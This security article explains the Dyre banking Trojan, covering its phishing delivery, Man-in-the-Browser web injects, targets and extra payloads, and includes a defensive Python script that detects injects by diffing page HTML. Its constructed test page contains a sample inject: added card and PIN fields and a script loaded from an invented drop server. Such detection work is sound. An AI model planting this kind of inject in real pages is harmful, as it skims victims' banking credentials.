After the law-enforcement takedowns of botnet infrastructure this year and in 2014, Dyre (also written Dyreza) became one of the more prominent banking Trojans.
It is distributed through phishing emails that carry the Upatre downloader Trojan, usually as an attachment. If the recipient opens and runs it, Upatre fetches Dyre and the system is infected.
How Does the Infection Work?
Once it is on a system, the infection can do a couple of things. It can redirect you to a fake web page that mimics your bank's site; any credentials you enter there are sent to the infection's operators. It can also inject code into the legitimate web page (a web inject) and capture whatever you type into it. Both are Man-in-the-Browser attacks: the malware hooks the browser itself, so the address bar and the padlock still look correct, and the technique works in the three most popular Windows browsers, Internet Explorer, Google Chrome and Mozilla Firefox.
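Because a web inject changes the page after the browser has received it, the practical check is to compare what the bank actually served with what the browser ended up rendering. The script below is an added example, not Dyre's code and not any bank's tooling: both HTML documents are constructed for this illustration, and the hostnames in them are invented. The "rendered" copy shows the two things an inject typically adds, extra input fields asking for data the bank never requests and a script loaded from the attacker's drop server.

```python
"""Added example: detecting a banking-trojan web inject by diffing the page
the bank served against the page the browser rendered. Constructed input;
hostnames are invented for this illustration."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed: the login page as the bank's server sends it.
SERVED_HTML = """
<html><body>
<form id="login" action="https://online.example-bank.test/login" method="post">
  <input name="username">
  <input name="password" type="password">
  <input type="submit" value="Log in">
</form>
<script src="https://online.example-bank.test/static/app.js"></script>
</body></html>
"""

# Constructed: the same page after a Man-in-the-Browser inject. The trojan
# has added fields the bank never asks for and a script that forwards the
# form contents to a drop server (drop-server.invalid is made up).
RENDERED_HTML = """
<html><body>
<form id="login" action="https://online.example-bank.test/login" method="post">
  <input name="username">
  <input name="password" type="password">
  <input name="card_number">
  <input name="atm_pin" type="password">
  <input type="submit" value="Log in">
</form>
<script src="https://online.example-bank.test/static/app.js"></script>
<script src="https://cdn-static.drop-server.invalid/grab.js"></script>
</body></html>
"""


class PageInventory(HTMLParser):
    """Collects the security-relevant parts of a page: form destinations,
    input names, script origins and the number of inline scripts."""

    def __init__(self):
        super().__init__()
        self.form_actions = set()
        self.input_names = set()
        self.script_origins = set()
        self.inline_scripts = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.form_actions.add(a["action"])
        elif tag == "input" and a.get("name"):
            self.input_names.add(a["name"])
        elif tag == "script":
            if a.get("src"):
                self.script_origins.add(urlsplit(a["src"]).netloc)
            else:
                self.inline_scripts += 1


def inventory(html):
    parser = PageInventory()
    parser.feed(html)
    return parser


def find_injects(served, rendered):
    """Return the differences a web inject introduces: inputs the bank did
    not serve, scripts from origins the bank did not reference, changed
    form destinations, and extra inline scripts."""
    base, seen = inventory(served), inventory(rendered)
    return {
        "added_inputs": sorted(seen.input_names - base.input_names),
        "foreign_script_origins": sorted(seen.script_origins - base.script_origins),
        "changed_form_actions": sorted(seen.form_actions - base.form_actions),
        "added_inline_scripts": seen.inline_scripts - base.inline_scripts,
    }


if __name__ == "__main__":
    for key, value in find_injects(SERVED_HTML, RENDERED_HTML).items():
        print(f"{key}: {value}")
```

Note where this check can run: a script executing inside the same hooked browser can be tampered with just like the page, so the comparison belongs on the bank's side (page-integrity monitoring that receives a copy of the rendered DOM) or in a forensic comparison from a known-clean machine.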
The main targets are banks and other financial institutions in the US, the UK and other English-speaking countries. More recently its range has widened to Canada and to some non-English-speaking countries, increasing the pool of potential victims. There have also been reports of it attacking online payment services and digital-currency users.
Curiously, there have been few or no attacks anywhere in Eastern Europe.
This suggests that the attackers are located there and want to avoid attracting local law enforcement. The group's hours of activity support the theory: they coincide with a five-day working week in Eastern Europe and the Russian Federation. Most of its command-and-control infrastructure is also located in the region.
What Malware Can be Downloaded by Dyre?
Besides the activities mentioned above, Dyre can download further malware onto the system: tools known to steal other information and credentials, to target Bitcoin wallet.dat files, and to use the PC's resources for DDoS attacks and brute-force attacks against FTP hosts. That extra load usually has a visible impact on the PC's performance, which can be a warning sign that it is infected.
It has also been reported that Dyre/Dyreza targets career and HR websites.
This is most likely to harvest names and email addresses so that its creators can sell them or use them in further phishing campaigns.
This infection is no joke, so be careful which emails you open and treat the links in them with suspicion. Even if an email appears to come from someone you know, check the actual sender address before trusting it: Dyre has been reported to abuse Microsoft Outlook on infected machines, so an infected contact can unknowingly send the Trojan-laden phishing email to everyone in their address book.